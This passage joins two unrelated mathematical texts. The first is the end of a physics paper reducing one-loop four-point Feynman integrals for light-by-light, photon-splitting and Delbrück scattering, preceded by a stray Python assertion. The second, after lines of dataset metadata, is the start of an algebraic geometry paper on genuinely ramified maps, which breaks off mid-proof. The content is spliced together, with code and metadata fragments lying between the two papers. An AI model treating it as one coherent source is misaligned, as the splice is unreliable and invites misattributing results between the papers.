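# y -> 1/y exchanges the two dilogarithm arguments and leaves ln^2 y
# unchanged, so F(y, yk) must equal F(1/y, yk):
assert abs(F(0.25, 0.5) - F(4.0, 0.5)) < 1e-9
```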
Substituting (\ref{best_I4LbL}) into the formula (\ref{boxLbyL}), we get
\begin{eqnarray}
&&I_4^{(d)}(m^2,m^2,m^2,m^2; 0,0,0,0,s_{24},s_{13})
\nonumber \\
&&~~~~~
=\frac{1}{2 s_{13}s_{24}\beta_2}
\Biggl[
F(y_{13},y_2)+F(y_{24},y_2)-4{\rm Li_2}\left(1- y_2\right)
\Biggr].~~~
\label{five_li}
\end{eqnarray}
Series representations of $L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)$
can be obtained from the integral representations (\ref{int_rep_B4}), (\ref{I4_LbyL}).
\section{
Integral $I_4^{(d)}$ for the photon splitting amplitude}
In this section, we turn to the
integral with one external line off-shell, which is
associated with the diagram $b)$ in Figure 1.
This integral corresponds to the kinematics
\begin{equation}
s_{23}=s_{34}=s_{14}=0,~~~~~~m_i^2=m^2.
\end{equation}
Using the final formula for functional reduction of
$I_4^{(d)}$ from ref. \cite{Tarasov:2022clb}, we get
\begin{eqnarray}
&&(s_{12}-s_{24}-s_{13})I_4^{(d)}(m^2,m^2,m^2,m^2,s_{12},0,0,0,s_{24},s_{13})
\nonumber \\
&& \nonumber \\
&&~~~~= s_{12}
L^{(d)}(\tilde{s}_{12},M_3^2,m^2)-s_{13}L^{(d)}(\tilde{s}_{13},M_3^2,m^2)
-s_{24}
L^{(d)}(\tilde{s}_{24},M_3^2,m^2).~~~~
\end{eqnarray}
where
\begin{equation}
M_3^2=\frac{s_{24}s_{13}}{4(s_{13}+s_{24}-s_{12})}.
\end{equation}
For $d=4$, we have
\begin{eqnarray}
&&I_4^{(4)}(m^2,m^2,m^2,m^2,s_{12},0,0,0,s_{24},s_{13})
\nonumber \\
&& \nonumber \\
&&~~~~~~~~ =\frac{
F(y_{13},y_3)+F(y_{24},y_3)-F(y_{12},y_3)
-2 {\rm Li}_2(1-y_3)}{2{s}_{24}{s}_{13}\beta_3},
\end{eqnarray}
where
\begin{equation}
y_3=\frac{\beta_3-1}{\beta_3+1},~~~~~\beta_3=\sqrt{1-\frac{m^2}{M_3^2}}.
\end{equation}
\section{
Integrals $I_4^{(d)}$ for the Delbr\"{u}ck scattering amplitude
}
We now turn to the more complicated integrals corresponding to the
diagrams $c)$ and $d)$ in Figure 1.
Inserting the values
of masses and kinematic variables for the integral represented by
the diagram $c)$,
\begin{equation}
s_{23}=s_{14}=0,~~~~~m_k^2=m^2, ~~~k=1,...,4,
\end{equation}
in the final formula for the functional reduction of $I_4^{(d)}$ from
ref. \cite{Tarasov:2022clb}, we get
\begin{eqnarray}
&&(s_{12}-s_{13}-s_{24}+s_{34})
I_4^{(d)}(m^2,m^2,m^2,m^2;s_{12},0,s_{34},0,s_{24},s_{13})
\nonumber \\
&&~~~~~~~~~~~~~~~~=
s_{12}L^{(d)}(\tilde{s}_{12},M_4^2,m^2)
-s_{13}L^{(d)}(\tilde{s}_{13},M_4^2,m^2)
\nonumber \\
&&~~~~~~~~~~~~~~~~
-s_{24}L^{(d)}(\tilde{s}_{24},M_4^2,m^2)
+s_{34}L^{(d)}(\tilde{s}_{34},M_4^2,m^2),~~~~~
\end{eqnarray}
where
\begin{eqnarray}
&& M^2_4=\frac{s_{12}s_{34}-s_{13}s_{24}}{4(s_{12}-s_{13}-s_{24}+s_{34})}.
\end{eqnarray}
At $d=4$, we obtain
\begin{eqnarray}
&&
I_4^{(4)}(m^2,m^2,m^2,m^2;s_{12},0,s_{34},0,s_{24},s_{13})
\nonumber \\
&& \nonumber \\
&&~~~~~~~~~~~
=\frac{F(y_{13},y_4)+F(y_{24},y_4)-F(y_{34},y_4)-F(y_{12},y_4)
}
{2({s}_{13}{s}_{24}-{s}_{12}{s}_{34})\beta_4},~~~
\end{eqnarray}
where
\begin{equation}
y_4=\frac{\beta_4-1}{\beta_4+1},~~~~~\beta_4=\sqrt{1-\frac{m^2}{M_4^2}}.
\end{equation}
Another integral contributing to the Delbr\"{u}ck
scattering cross section is represented by the diagram $d)$ in Figure 1.
The kinematics corresponding to this diagram reads
\begin{equation}
s_{34}=s_{14}=0,~~~~m_k^2=m^2,~~~~k=1,...,4.
\end{equation}
Substituting these values into the final formula for functional
reduction \cite{Tarasov:2022clb}, we obtain
\begin{eqnarray}
&&d_1d_2
I_4^{(d)}(m^2,m^2,m^2,m^2;s_{12},s_{23},0,0,s_{24},s_{13})
\nonumber \\
&&=
\frac12 d_1 s_{13} s_{24}I_4^{(d)}(m_0^2,m^2,m^2-\tilde{s}_{13},m^2)
-\frac12 d_1 s_{23} s_{24}I_4^{(d)}(m_0^2,m^2,m^2-\tilde{s}_{23},m^2)
\nonumber \\
&&
-~\frac12 d_1 s_{12}s_{24} I_4^{(d)}(m_0^2,m^2,m^2-\tilde{s}_{12},m^2)
+d_1 s_{24}^2I_4^{(d)}(m_0^2,m^2,m^2-\tilde{s}_{24},m^2)
\nonumber \\
&&
+~\frac12 n_1 s_{12}(s_{12}-s_{13}-s_{23})
I_4^{(d)}(m_0^2,\tilde{m}^2_0,m^2-\tilde{s}_{12},m^2)
\nonumber \\
&&-~
\frac12 n_1 s_{13}(s_{12}-s_{13}+s_{23})
I_4^{(d)}(m_0^2,\tilde{m}^2_0,m^2-\tilde{s}_{13},m^2)
\nonumber \\
&&-~
\frac12 n_1 s_{23}(s_{12}+s_{13}-s_{23})
I_4^{(d)}(m_0^2,\tilde{m}^2_0,m^2-\tilde{s}_{23},m^2),
\label{I4fig_d}
\end{eqnarray}
where
\begin{equation}
m_0^2 = m^2-\tilde{s}_1,
~~~~~~\tilde{m}^2_0=m^2-\tilde{s}_2,
~~~~~~\tilde{s}_1 = \frac{s_{13}s_{24}^2}{4 d_2},
~~~~~~\tilde{s}_2=-\frac{s_{12}s_{13}s_{23}}{d_1},
\end{equation}
\begin{eqnarray}
&&n_1=2s_{12}s_{23}-s_{12}s_{24}+s_{13}s_{24}-s_{23}s_{24}, \nonumber \\
&&d_1=s_{12}^2+s_{13}^2+s_{23}^2-2 s_{12}s_{13}-2 s_{12}s_{23}-2s_{13}s_{23},
\nonumber \\
&&
d_2=s_{12}s_{23}-s_{12}s_{24}+s_{13}s_{24}-s_{23}s_{24}+s_{24}^2.
\end{eqnarray}
The first four integrals in the equation (\ref{I4fig_d}) are
expressed in terms of the function $L^{(d)}$. The three remaining integrals
$I_4^{(d)}(m_0^2,\tilde{m}^2_0,m^2-\tilde{s}_{ij},m^2)$,
can be calculated using the formula from ref. \cite{Tarasov:2022clb}
\begin{eqnarray}
&&I_4^{(d)}(r_{1234},r_{234},r_{34},r_4)
=
\int_0^1\int_0^1\!\int_0^1\frac{\Gamma\left(4-\frac{d}{2}\right)
x_1^2x_2~ dx_1dx_2dx_3 }
{\left[
a-b x_1^2-c x_1^2x_2^2 -e x_1^2x_2^2x_3^2
\right]^{4-\frac{d}{2}}},~~~~~~~
\label{I4param}
\end{eqnarray}
where
\begin{equation}
a=r_{1234},~~~~~b=r_{1234}-r_{234},~~~~~c=r_{234}-r_{34},
~~~~~e=r_{34}-r_4.
\end{equation}
For $d=4$, the integral (\ref{I4param}) can be calculated as a
combination
of functions $L^{(4)}$ with various arguments. The detailed derivation
of the result will be described in an expanded version of this article.
\section{
Conclusions}
Our results clearly indicate that the application
of the functional reduction method makes it possible to reduce
complicated integrals to simpler integrals.
Even if the number of variables in the integrals resulting from
applying
the functional reduction is the same as in the original integral,
these integrals are simpler than the original integral.
In general, integrals depending on more than four variables
are reduced to a combination of integrals with four or
fewer variables, which are also simpler than the original integral.
The fact that the results for the integrals discussed in this paper are expressed in
terms of the same function $L^{(d)}$ may be useful
for improving the accuracy and efficiency
of calculating radiative corrections.
The integral representation (\ref{I4_LbyL}) can significantly simplify
the calculation of higher order terms in the
$\varepsilon$ expansion of integrals considered in the article.
| 2024-02-18T23:40:18.410Z | 2022-11-29T02:28:26.000Z | algebraic_stack_train_0000 | 2,011 | 3,673 |
|
proofpile-arXiv_065-9864 | \section{Introduction}
Here we continue, from \cite{PS}, \cite{BP1}, \cite{BP2}, the investigations of the direct
image $f_*{\mathcal O}_X$, where $f\, :\, X\, \longrightarrow\, Y$ is a separable finite
surjective map between irreducible normal projective varieties defined over an
algebraically closed field $k$. First we briefly recall the main results of \cite{BP1},
\cite{BP2}.
The above map $f$ is called genuinely ramified if the homomorphism between
\'etale fundamental groups
$$f_*\, \colon \, \pi_1^{\rm et}(X)\,\longrightarrow\, \pi_1^{\rm et}(Y)$$
induced by $f$ is surjective.
Consider the unique maximal pseudo-stable subbundle ${\mathbb S}\, \subset\, f_*{\mathcal O}_X$;
the existence of this subbundle is proved in \cite{BP2}.
The map $f$ is genuinely ramified if and only if ${\rm rank}({\mathbb S})\,=\, 1$ \cite{BP2}. When
$\dim X\,=\,1\,=\, \dim Y$, this was proved earlier in \cite{BP1}. When
$\dim X\,=\,1\,=\, \dim Y$, if $E$ is a stable vector bundle on $Y$, and $f$ is genuinely ramified, then $f^*E$ is
also stable \cite{BP1}.
Here we prove the following (see Theorem \ref{thm1}):
\begin{theorem}\label{thmi1}
Let $f\, :\, X\, \longrightarrow\, Y$ be a finite separable
surjective map between irreducible normal projective varieties
defined over an algebraically closed field $k$. Then the following four statements
are equivalent.
\begin{enumerate}
\item The map $f$ is genuinely ramified.
\item There is no nontrivial \'etale covering $g\, :\, Y'\,\longrightarrow\, Y$ satisfying the condition
that there is a map $g'\, :\, X\,\longrightarrow\, Y'$ for which $g\circ g'\,=\, f$.
\item The fiber product $X\times_Y X$ is connected.
\item $\dim H^0(X,\, (f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm torsion})\,=\, 1$.
\end{enumerate}
\end{theorem}
This theorem leads to the following generalization, to higher dimensions, of the above mentioned result
for curves (see Theorem \ref{thm2}):
\begin{theorem}\label{thmi2}
Let $f\, :\, X\, \longrightarrow\, Y$ be a finite separable surjective map
between irreducible normal
projective varieties such that $f$ is genuinely ramified. Let $E$ be a stable vector bundle on
$Y$. Then the pulled back vector bundle $f^*E$ is also stable.
\end{theorem}
It should be noted that, given a map $f$ as above, if $E$ is a vector bundle on $Y$ such that $f^*E$ is stable, then $E$ itself is stable.
Given a stable vector bundle $E$ on $X$ we may ask for a criterion for it to descend to $Y$ (meaning
a criterion for $E$ to be the pullback of a vector bundle on $Y$). The following criterion is deduced
using Theorem \ref{thmi2} (see Theorem \ref{thm3}):
\begin{theorem}\label{thmi3}
Let $f\, \colon \, X\, \longrightarrow\, Y$ be a genuinely ramified map of irreducible normal
projective varieties. Let $E$ be a stable vector bundle on $X$. Then there is a vector bundle $W$ on $Y$ with
$f^*W$ isomorphic to $E$ if and only if $f_*E$ contains a stable vector bundle $F$ such that
$$
\frac{{\rm degree}(F)}{{\rm rank}(F)}\,=\, \frac{1}{{\rm degree}(f)}\cdot \frac{{\rm degree}(E)}{{\rm rank}(E)}\,.
$$
\end{theorem}
Let $M$ be a smooth projective variety over $k$. If the \'etale fundamental group
of $M$ is trivial, then the stratified fundamental group of $M$ is also trivial \cite{EM}.
Let $f\, :\, M\, \longrightarrow\, {\mathbb P}^d_k$ be a finite
separable map, where $d\,=\, \dim M$.
The above mentioned result of \cite{EM} has the following equivalent reformulation:
If $f$ induces an isomorphism of the \'etale fundamental groups, then it
induces an isomorphism of the stratified fundamental groups. In view of this
reformulation, it is natural to ask the following question:
If $f\, :\, X\, \longrightarrow\, Y$ is a finite separable
surjective map between irreducible normal projective varieties such that the
corresponding homomorphism of the \'etale fundamental groups is surjective, then does
$f$ induce a surjection of the stratified fundamental groups?
We hope that Theorem \ref{thmi2} would shed some light on this question.
\section{Genuinely ramified maps}
Let $k$ be an algebraically closed field; there is no assumption on the characteristic of $k$.
Following \cite{PS}, \cite{BP1}, \cite{BHS} we define:
\begin{definition}\label{def1}
A separable finite surjective map
$$
f\,\, \colon \,\, X\, \longrightarrow\, Y
$$
between irreducible normal projective $k$-varieties is said to be \textit{genuinely ramified}
if the homomorphism between \'etale fundamental groups
$$f_*\, \colon \, \pi_1^{\rm et}(X)\,\longrightarrow\, \pi_1^{\rm et}(Y)$$
induced by $f$ is surjective.
\end{definition}
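To illustrate Definition \ref{def1}, we record two standard examples; they are not needed in what follows.

\begin{remark}
Since $\pi_1^{\rm et}({\mathbb P}^1_k)$ is trivial, every separable finite surjective map
$X\, \longrightarrow\, {\mathbb P}^1_k$ from an irreducible normal projective variety $X$ is
genuinely ramified. At the other extreme, a nontrivial \'etale covering
$f\, \colon\, X\, \longrightarrow\, Y$ is never genuinely ramified: since $X$ is connected,
the image of $f_*$ is a subgroup of $\pi_1^{\rm et}(Y)$ of index ${\rm degree}(f)\, \geq\, 2$.
In particular, no isogeny of elliptic curves of degree at least two is genuinely ramified.
\end{remark}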
Let
\begin{equation}\label{e1}
f\, \colon \, X\, \longrightarrow\, Y
\end{equation}
be a separable finite surjective map between irreducible normal projective varieties.
Since $X$ and $Y$
are normal, and $f$ is a finite surjective map, the direct image $f_*{\mathcal O}_X$
is a reflexive sheaf on $Y$ whose rank coincides with the degree of the map $f$.
To define the degree of a torsionfree sheaf on $Y$, we fix a very ample
line bundle $L_Y$ on $Y$. Since $f$ is a finite map, the line bundle $f^*L_Y$ on $X$ is ample.
Equip $X$ with the polarization $f^*L_Y$. In what follows, the degrees of sheaves on
$Y$ and $X$ are always computed with respect to the polarizations $L_Y$ and $f^*L_Y$ respectively. For
a torsionfree sheaf $F$, define
$$
\mu(F)\,:=\, \frac{{\rm degree}(F)}{{\rm rank}(F)}\,\in\, \mathbb Q\, .
$$
We recall
that a torsionfree sheaf $E$ is called {\it stable} (respectively, {\it semistable}) if for all
subsheaves $V\, \subset\, E$, with $0\,<\, {\rm rank }(V)\,<\, {\rm rank}(E)$, the inequality
$$
\mu(V)\, <\, \mu(E) \ \ {\rm (respectively, }\ \mu(V)\, \leq\, \mu(E){\rm )}
$$
holds. If $E_1\, \subset\, E$ is the first nonzero term of the Harder-Narasimhan filtration of $E$, then
$$
\mu_{\rm max}(E)\,:=\, \mu(E_1)
$$
\cite{HL}. In particular, if $E$ is semistable, then $\mu_{\rm max}(E)\,=\, \mu(E)$.
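Since $X$ is polarized by $f^*L_Y$, degrees multiply by ${\rm degree}(f)$ under pullback. The following standard computation records this fact, which will be used repeatedly.

\begin{remark}
For any vector bundle $W$ on $Y$, the projection formula for intersection numbers gives
$$
{\rm degree}(f^*W)\,=\, \left(c_1(f^*W)\cdot c_1(f^*L_Y)^{\dim X-1}\right)\,=\,
{\rm degree}(f)\cdot\left(c_1(W)\cdot c_1(L_Y)^{\dim Y-1}\right)\,=\,
{\rm degree}(f)\cdot{\rm degree}(W)\, ,
$$
and hence $\mu(f^*W)\,=\, {\rm degree}(f)\cdot \mu(W)$. A similar computation applies to
torsionfree sheaves on $Y$.
\end{remark}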
For any coherent sheaves $E$ and $F$ on $X$ and $Y$ respectively, the projection formula gives
$$
f_*{\rm Hom} (f^* F, \, E)\,=\, f_*((f^*F^*)\otimes E)\,=\, F^*\otimes f_*E\,=\, {\rm Hom}(F,\, f_*E)\, .
$$
Since $f$ is a finite map, this gives the following:
\begin{equation}\label{eq_adjoint}
H^0(X,\, {\rm Hom} (f^* F, \, E))\,=\, H^0(Y,\, f_*{\rm Hom} (f^* F, \, E))\,=\, H^0(Y, \, {\rm Hom}(F, \, f_* E))\, .
\end{equation}
Setting $E\,=\, {\mathcal O}_X$
and $F\,=\,{\mathcal O}_Y$ in \eqref{eq_adjoint} we conclude that the identification $f^*{\mathcal O}_Y\,
\stackrel{\sim}{\longrightarrow}\, {\mathcal O}_X$ produces an inclusion homomorphism
\begin{equation}\label{e0}
{\mathcal O}_Y\, \hookrightarrow\, f_*{\mathcal O}_X\, .
\end{equation}
{}From \eqref{e0} it follows immediately that $\mu_{\rm max}(f_*{\mathcal O}_X)\, \geq\, 0$. In fact,
\begin{equation}\label{e2}
\mu_{\rm max}(f_*{\mathcal O}_X)\, =\, 0
\end{equation}
\cite[Lemma 2.2]{BP1}; although Lemma 2.2 of \cite{BP1} is stated under the assumption that
$\dim Y\,=\,1$, its proof works for all dimensions.
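The equality \eqref{e2} can be checked directly in a basic example, which is not needed later.

\begin{remark}
Let $f\, \colon\, {\mathbb P}^1_k\, \longrightarrow\, {\mathbb P}^1_k$ be the covering of
degree $n$ defined by $z\, \longmapsto\, z^n$, where $n$ is coprime to the characteristic of
$k$ (so that $f$ is separable). Then
$$
f_*{\mathcal O}_{{\mathbb P}^1}\,\cong\, {\mathcal O}_{{\mathbb P}^1}\oplus
{\mathcal O}_{{\mathbb P}^1}(-1)^{\oplus (n-1)}\, ,
$$
so $\mu_{\rm max}(f_*{\mathcal O}_{{\mathbb P}^1})\,=\,0$, and the maximal destabilizing
subsheaf is exactly the subsheaf ${\mathcal O}_{{\mathbb P}^1}$ in \eqref{e0}.
\end{remark}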
We recall from \cite{BP2} the definition of a pseudo-stable sheaf.
\begin{definition}
A {\it pseudo-stable sheaf} on $Y$ is a semistable sheaf $F$ on $Y$ such that $F$ admits a filtration of subsheaves
\begin{equation}\label{fi1}
0 = F_0 \, \subsetneq \, F_1 \, \subsetneq \, \cdots \, \subsetneq \, F_{n-1} \, \subsetneq \, F_n \, = \, F
\end{equation}
satisfying the condition that $F_i/F_{i-1}$ is a stable reflexive sheaf with $\mu(F_i/F_{i-1})\,=\, \mu(F)$ for
every $1 \,\leq\, i \,\leq \,n$.
A {\it pseudo-stable bundle} on $Y$ is a pseudo-stable sheaf $F$ as above such that
\begin{itemize}
\item $F$ is locally free, and
\item for each $1 \,\leq\, i \,\leq \,n$ the quotient $F_i/F_{i-1}$ in \eqref{fi1} is locally free.
\end{itemize}
\end{definition}
The first of these two conditions is in fact implied by the second one.
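For illustration, we note some basic examples of pseudo-stable sheaves.

\begin{remark}
Every stable reflexive sheaf on $Y$ is pseudo-stable (take $n\,=\,1$ in \eqref{fi1}). More
generally, if $V_1,\, \cdots,\, V_n$ are stable reflexive sheaves on $Y$ with
$\mu(V_1)\,=\,\cdots\,=\,\mu(V_n)$, then any successive extension of them is pseudo-stable;
in particular, the direct sum
$$
F\,=\, V_1\oplus \cdots \oplus V_n,
$$
equipped with the filtration $F_i\,=\, V_1\oplus\cdots\oplus V_i$, is pseudo-stable. Thus
every polystable vector bundle on $Y$ is a pseudo-stable bundle.
\end{remark}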
For the map $f$ in \eqref{e1}
consider the maximal destabilizing subsheaf $HN_1(f_* \mathcal{O}_X)$ of the reflexive coherent sheaf
$f_* \mathcal{O}_X$ on $Y$; in other words, $HN_1(f_* \mathcal{O}_X)$ is the first nonzero term in the
Harder-Narasimhan filtration of $f_* \mathcal{O}_X$. Recall from \eqref{e2} that
$$\mu(HN_1(f_* \mathcal{O}_X)) = \mu_{\rm max}(f_* \mathcal{O}_X) = 0\,.$$
Since $\mathcal{O}_Y \,\subset\, HN_1(f_* \mathcal{O}_X)$ (see \eqref{e0}) is a stable locally free
subsheaf of degree $0$, we conclude that \cite[Theorem 4.3]{BP2} applies to $f_* \mathcal{O}_X$. Let
\begin{equation}\label{e3}
{\mathbb S}\, \subset\, f_*{\mathcal O}_X
\end{equation}
be the unique maximal pseudo-stable bundle of degree zero such that $(f_*{\mathcal O}_X)/{\mathbb S}$
is torsionfree \cite[Theorem 4.3]{BP2}. Note that we have
\begin{equation}\label{t1}
{\mathcal O}_Y\, \subset\,{\mathbb S}.
\end{equation}
\begin{notation}
For any $k$-variety $Z$, and a coherent sheaf $F$ on $Z$, we write
$$
F_{\rm tor} \subset F
$$
for the torsion subsheaf of $F$. Also, define
\begin{equation}\label{en}
H^0_{\mathbb F}(Z,\, F)\, :=\, H^0(Z,\, F/F_{\rm tor}).
\end{equation}
\end{notation}
In particular,
\begin{equation}\label{e4}
H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)\, = \,
H^0(X,\, (f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor})\, .
\end{equation}
Consider the Cartesian diagram
\begin{equation}\label{e5}
\begin{tikzcd}[row sep=large]
X\times_Y X \arrow[r, "p_2"] \arrow[dr, phantom, "\square"] \ar[d, "p_1"] & X \arrow[d, "f"]\\
X \arrow[r, "\widetilde{f}:=f"] & Y
\end{tikzcd}
\end{equation}
where $p_1$ and $p_2$ are the natural projections to the first and second factors
respectively. Since $f$ is a finite morphism, by the proper
base change theorem of quasi-coherent sheaves we have
\begin{equation}\label{e6}
\widetilde{f}^*f_*{\mathcal O}_X \,=\, f^*f_*{\mathcal O}_X\,=\, (p_1)_* {\mathcal O}_{X\times_Y X}
\end{equation}
(see \cite[Part 3, Ch.~59, \S~59.55, Lemma 59.55.3]{St}).
Pulling back the inclusion map in \eqref{e0} to $X$ we obtain
$$
{\mathcal O}_X \, \subset\, f^*f_*{\mathcal O}_X\, \cong \,(p_1)_* {\mathcal O}_{ X\times_Y X}.
$$
This implies that
\begin{equation}\label{e4b}
\dim H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)\, \geq\, 1
\end{equation}
(see \eqref{e4}).
We can also describe $H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$ in terms of the cohomology of a sheaf on
the reduced scheme $(X\times_Y X)_{\rm red}$. Let
\begin{equation}\label{cz}
{\mathcal Z}\, \,:=\, \, (X\times_Y X)_{\rm red}\,\, \subset\,\, X\times_Y X
\end{equation}
be the reduced subscheme. So ${\mathcal O}_{\mathcal Z}$ is a quotient of ${\mathcal O}_{X\times_Y X}$.
Let
\begin{equation}\label{ecj}
j \, :\, \mathcal{Z} \, \longrightarrow \, X\times_Y X
\end{equation}
be the closed immersion. Let
\begin{equation}\label{pi}
p'_1,\, p'_2\, \colon \, {\mathcal Z}\,\longrightarrow\,X
\end{equation}
be the restrictions to $\mathcal Z$ of the projections $p_1,\, p_2$ respectively in \eqref{e5}. For $i\,=\, 1,\,
2$, we have $p_i \circ j = p'_i$, where $j$ is the map in \eqref{ecj}. Then
\begin{eqnarray}
(p'_{1})_* {\mathcal O}_{\mathcal Z} & \, = \, & (p_1)_* j_* \mathcal{O}_{\mathcal{Z}}
\nonumber\\
& \, = \, & (p_1)_* (\mathcal{O}_{X\times_Y X}/(\mathcal{O}_{X\times_Y X})_{\rm tor})
\nonumber\\
& \, = \, & ((p_1)_*\mathcal{O}_{X\times_Y X})/((p_1)_*\mathcal{O}_{X\times_Y X})_{\rm tor}.
\label{tq}
\end{eqnarray}
To explain the last equality in \eqref{tq}, note the following:
\begin{itemize}
\item If $\mathcal V$ is a torsionfree sheaf on $X\times_Y X$, then
$(p_1)_*\mathcal V$ is a torsionfree sheaf on $X$.
\item If $\mathcal V$ is a torsion sheaf on $X\times_Y X$, then
$(p_1)_*\mathcal V$ is a torsion sheaf on $X$.
\end{itemize}
Hence \eqref{tq} holds.
In view of \eqref{tq} and the isomorphism in \eqref{e6}, we conclude that
$$
(p'_{1})_* {\mathcal O}_{\mathcal Z}\, = \, (f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor}\, .
$$
This implies that
\begin{equation}\label{eq_torsion_reduced}
H^0(X,\, (p'_{1})_* {\mathcal O}_{\mathcal Z})\,=\, H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)
\,=\, H^0(X,\, (p'_{2})_* {\mathcal O}_{\mathcal Z})
\end{equation}
(the notation in \eqref{en} is used).
\begin{theorem}\label{thm1}
As in \eqref{e1}, let $f\, :\, X\, \longrightarrow\, Y$ be a finite separable surjective
map between irreducible normal projective varieties. Then the following five statements
are equivalent.
\begin{enumerate}
\item The map $f$ is genuinely ramified.
\item There is no nontrivial \'etale covering $g\, :\, Y'\,\longrightarrow\, Y$ satisfying the condition
that there is a map $g'\, :\, X\,\longrightarrow\, Y'$ for which $g\circ g'\,=\, f$.
\item The fiber product $X\times_Y X$ is connected.
\item $\dim H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)\,=\, 1$ (see \eqref{e4}).
\item The subsheaf ${\mathbb S}\, \subset\, f_*{\mathcal O}_X$ in \eqref{e3} coincides with the subsheaf
${\mathcal O}_Y$ in \eqref{e0};
in other words, the inclusion in \eqref{t1} is an equality. This is equivalent to the condition that
${\rm rank}({\mathbb S})\,=\, 1$.
\end{enumerate}
\end{theorem}
\begin{proof}
We will show that $(1) \Leftrightarrow (2)$, $(1) \Leftrightarrow (5)$, $(3) \Leftrightarrow (4)$, $(3) \Rightarrow
(2)$ and $(5) \Rightarrow (4)$.
Let
$$f_*\, :\, \pi_1^{\rm et}(X)\,\longrightarrow\, \pi_1^{\rm et}(Y)$$
be the homomorphism between the \'etale fundamental groups induced by the map $f$.
Since the map $f$ is dominant, $f_*(\pi_1^{\rm et}(X))$ is a subgroup of
$\pi_1^{\rm et}(Y)$ of finite index. In fact, the index of this
subgroup is at most $\text{degree}(f)$. Let
$$
g\, :\, Y'\,\longrightarrow\, Y
$$ be the \'etale covering for this subgroup $f_*(\pi_1^{\rm et}(X))\, \subset\,
\pi_1^{\rm et}(Y)$. Then there is a morphism
$g'\, :\, X\,\longrightarrow\, Y'$ such that $g\circ g'\,=\, f$. To explain this map $g'$, fix a point
$y_0\, \in\, Y$ and also fix points $x_0\, \in\, X$ and $y_1\, \in\, Y'$ over $y_0$. Let $X'$
be the connected component of the fiber product $X\times_Y Y'$ containing the point $(x_0,\, y_1)$. The
given condition that $f_*(\pi_1^{\rm et}(X,\, x_0))\,=\, g_*(\pi_1^{\rm et}(Y',\, y_1))$ implies that the
\'etale covering $f'\, :\, X'\, \longrightarrow\, X$, where $f'$ is
the natural projection, induces an isomorphism of \'etale fundamental groups.
Hence $f'$ is actually an isomorphism. If $g'$ is the composition of maps $$X\, \stackrel{\sim}{\longrightarrow}\, X'
\, \longrightarrow\, Y'\, ,$$ where $X'\, \longrightarrow\, Y'$ is the natural projection, then
clearly, $g\circ g'\,=\, f$.
Therefore, the statement (2) implies the statement (1). Conversely, if there is a nontrivial \'etale covering
$g\, :\, Y'\,\longrightarrow\, Y$ and a morphism $g'\, :\, X\,\longrightarrow\, Y'$ such that
$g\circ g'\,=\, f$, then the homomorphism $f_*$ is not surjective, because the homomorphism $g_*$ is
not surjective. So the statements (1) and (2) are equivalent.
It is known that the statements (1) and (5) are equivalent; see \cite[Proposition 1.3]{BP2}.
We will now prove that the statements (3) and (4) are equivalent.
The fiber product $X\times_Y X$ is connected if and only if $\dim H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})
\,=\,1$, where $\mathcal Z$ is constructed in \eqref{cz}. Therefore, $X\times_Y X$ is connected if and only if
$$\dim H^0(X,\, (p'_{1})_* {\mathcal O}_{\mathcal Z})\,=\, 1,$$ where $p'_1$ is the map in
\eqref{pi}. Consequently, from \eqref{eq_torsion_reduced} it follows
immediately that the statements (3) and (4) are equivalent.
Next we will show that the statement (3) implies the statement (2).
Assume that (2) does not hold. So there is a nontrivial \'etale covering
$$g\, :\, Y'\,\longrightarrow\, Y$$ and a map
$g'\, :\, X\,\longrightarrow\, Y'$ such that $g\circ g'\,=\, f$. Since $g$ is \'etale, the fiber product
$Y'\times_Y Y'$ is a reduced normal projective scheme. However, $Y'\times_Y Y'$ is not connected. In fact,
the image of the diagonal embedding $Y'\, \hookrightarrow\, Y'\times_Y Y'$ is a connected component of
$Y'\times_Y Y'$. Note that this diagonal embedding is not surjective because $g$ is
nontrivial. Since the map
$$
(g',\, g')\, :\, X\times_Y X\,\longrightarrow\, Y'\times_Y Y'
$$
is surjective, and $Y'\times_Y Y'$ is not connected, we conclude that $X\times_Y X$ is
not connected. Hence the statement (3) implies the statement (2).
Finally, we will prove that the statement (5) implies the statement (4).
Assume that the statement (4) does not hold. So from \eqref{e4b} it follows that
\begin{equation}\label{em}
n\, :=\, \dim H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)\,\geq \, 2\, .
\end{equation}
Choose a finite field extension $k(X)\,\subset\,L$ such that the extension $k(Y)\,\subset\,L$ is Galois. Let $$\Gamma \, = \, \text{Gal}(L/k(Y))$$
be the corresponding Galois group. Let $M$ be the normalization of $X$ in $L$. So $M$ is an irreducible normal projective
variety with $k(M)\,=\,L$, and
$$
\widehat{f} \, \,\colon\,\, M \, \longrightarrow \, Y
$$
is a Galois (possibly branched) cover dominating the map $f$;
the Galois group for $\widehat{f}$ is $\text{Gal}(L/k(Y))\,=\, \Gamma$. Let
\begin{equation}\label{eg}
g \,\, \colon \,\, M \, \longrightarrow \, X
\end{equation}
be the morphism induced by the inclusion map $k(X)\,\hookrightarrow\,L$, so $f\circ g\,=\, \widehat{f}$.
Let
\begin{equation}\label{g1}
\varphi\, :\, {\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)\, \longrightarrow\,
(f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor}
\end{equation}
be the evaluation homomorphism. We will show that this homomorphism $\varphi$ of coherent sheaves
is injective. To prove this, first note that for a semistable sheaf $V$ on $Y$,
the pullback $(f^*V)/(f^*V)_{\rm tor}$ is semistable (see \cite[Remark 2.1]{BP1}; the proof in
\cite[Remark 2.1]{BP1} works for all dimensions). Therefore, from \eqref{e2} we conclude that
\begin{equation}\label{g2}
\mu_{\rm max}((f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor})\, =\, 0\, .
\end{equation}
Any coherent subsheaf ${\mathcal W}\, \subset\, {\mathcal O}_X\otimes H^0_{\mathbb F}
(X,\, f^*f_*{\mathcal O}_X)$
such that
\begin{enumerate}
\item $\text{degree}({\mathcal W})\,=\, 0$, and
